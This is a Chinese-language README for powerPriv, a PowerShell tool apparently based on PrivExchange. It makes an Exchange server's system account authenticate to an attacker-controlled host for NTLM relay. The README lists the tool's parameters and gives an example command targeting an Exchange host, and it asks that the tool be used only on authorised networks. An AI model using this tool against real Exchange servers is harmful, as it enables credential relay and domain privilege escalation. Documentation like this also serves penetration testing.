一个基于 @_dirkjan 的 PrivExchange 的 PowerShell 实现(原始代码见:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) 适用于无法运行基于 Python 的应用程序、拥有用户凭据或不想将文件释放到磁盘的环境。该工具将使目标 Exchange 服务器的系统账户尝试向您选择的系统进行身份验证。
-targetHost目标 Exchange 服务器的主机名或 IP。根据 DNS 配置,使用主机名时可能需要 FQDN。(必需)
-attackerHost您控制的系统的主机名或 IP,最好在此系统上运行 ntlmrelayx。我们告诉 Exchange 服务器尝试向该系统进行身份验证。根据 DNS 配置,使用主机名时可能需要 FQDN。(必需)
-exchangePort尝试连接 Exchange 服务器的端口。默认为 443。
-attackerPortExchange 应尝试回连到攻击者系统的端口。默认为 80。
-attackerPage我们告诉 Exchange 服务器在我们的攻击系统上连接的页面。不需要斜杠。默认为 powerPriv。
-noSSL如果不想在初始连接 Exchange 服务器时使用 https,则设置为 true。默认为 false(使用 https)。
-Version目标 Exchange 服务器的版本。默认为 2013。
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
作者:@g0ldenGunSec - 基于 @_dirkjan 创建的工具
请仅在您拥有或获得测试许可的网络中使用此工具。